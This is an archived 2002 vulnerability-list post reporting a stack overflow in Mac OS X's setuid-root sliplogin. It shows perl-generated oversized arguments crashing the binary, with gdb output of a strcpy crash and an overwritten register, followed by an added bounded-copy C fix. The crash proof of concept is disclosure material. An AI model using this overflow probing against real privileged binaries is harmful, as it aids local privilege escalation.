Vulnerability Development mailing list archives

Apple OSX sliplogin overflow


From: Kevin Finisterre <dotslash () snosoft com>
Date: Wed, 15 May 2002 15:41:20 -0700

(side note ... isn't it odd that I can run gdb on a suid binary?)

OS X version 10.1.3

[localhost:~] elguapo% ls -al /usr/sbin/sliplogin
-r-sr-xr-x  1 root  wheel  14700 Dec  8 10:49 /usr/sbin/sliplogin

[localhost:~] elguapo% sliplogin `perl -e 'print "A" x 9000'`
Bus error

[localhost:~] elguapo% uname -a
Darwin localhost 5.3 Darwin Kernel Version 5.3: Thu Jan 24 22:06:02 PST 2002; root:xnu/xnu-201.19.obj~1/RELEASE_PPC Power Macintosh powerpc

[localhost:~] elguapo% id
uid=501(elguapo) gid=20(staff) groups=20(staff), 0(wheel), 80(admin)
[localhost:~] elguapo% ls -al /usr/sbin/sliplogin
-r-sr-xr-x  1 root  wheel  14700 Dec  8 10:49 /usr/sbin/sliplogin
[localhost:~] elguapo% gdb /usr/sbin/sliplogin
GNU gdb 5.0-20001113 (Apple version gdb-203) (Wed Nov 7 16:28:57 GMT 2001) (UI_OUT)
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "powerpc-apple-macos10".
Reading symbols for shared libraries .. done
(gdb) r `perl -e 'print "A" x 1476'`
Starting program: /usr/sbin/sliplogin `perl -e 'print "A" x 1477'`
[Switching to thread 1 (process 339 thread 0x1603)]

Program received signal EXC_BAD_ACCESS, Could not access memory.
0x70004c88 in strcpy ()
(gdb) bt
#0  0x70004c88 in strcpy ()
#1  0x00001bd4 in ?? ()
#2  0x00002278 in ?? ()
#3  0x00001af4 in ?? ()
#4  0x00001924 in ?? ()

I have not been able to accomplish anything short of overwriting r0 with 41. If the sc command gets called, you could control the next syscall by changing the value in r0. I personally can do nothing with it...

(gdb) r `perl -e 'print "A" x 1478'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /usr/sbin/sliplogin `perl -e 'print "A" x 1478'`
[Switching to thread 1 (process 351 thread 0x1c07)]

Program received signal EXC_BAD_ACCESS, Could not access memory.
0x70004c88 in strcpy ()
(gdb) i r
r0             0x41     65

-KF
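The crash above lands inside strcpy() with the argument copied into a fixed-size frame. As an added example (not sliplogin's source, which the post does not show), here is the bounded form of that copy: the buffer size LOGIN_BUF and the function names are assumptions, and the point is that oversized input is rejected before any byte is written rather than overrunning the stack.

```c
/* Added example, not sliplogin's own code.  The unsafe pattern behind the
 * "Bus error" above is strcpy(login, argv[1]) into a fixed stack buffer; this
 * version checks the length first and fails closed.  LOGIN_BUF is an assumed
 * size, since the post does not show the real buffer. */
#include <stdio.h>
#include <string.h>
#include <errno.h>

#define LOGIN_BUF 64   /* assumed size of the fixed login buffer */

/* Bounded replacement for strcpy(): returns 0 on success, -1 (errno=E2BIG)
 * when src plus its NUL would not fit in dstsz bytes.  strnlen() stops
 * scanning at dstsz, so an unterminated or huge src never walks far. */
static int copy_login_bounded(char *dst, size_t dstsz, const char *src)
{
    size_t n = strnlen(src, dstsz);
    if (n >= dstsz) {
        errno = E2BIG;
        return -1;          /* too long: write nothing, reject the argument */
    }
    memcpy(dst, src, n + 1); /* n + 1 copies the terminating NUL too */
    return 0;
}

/* Mirrors what a setuid helper should do with argv[1]: accept names that fit
 * the frame (return 0) and reject the rest (return -1) instead of crashing. */
int handle_login_arg(const char *arg)
{
    char login[LOGIN_BUF];
    if (copy_login_bounded(login, sizeof login, arg) != 0)
        return -1;
    return 0;               /* login is now a properly terminated C string */
}

int main(int argc, char **argv)
{
    if (argc < 2) {
        fprintf(stderr, "usage: %s login\n", argv[0]);
        return 2;
    }
    if (handle_login_arg(argv[1]) != 0) {
        fprintf(stderr, "login name too long (max %d bytes)\n", LOGIN_BUF - 1);
        return 1;
    }
    puts("accepted");
    return 0;
}
```

Run it with the same `perl -e 'print "A" x 9000'` argument from the post and it exits 1 with an error message instead of a bus error.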
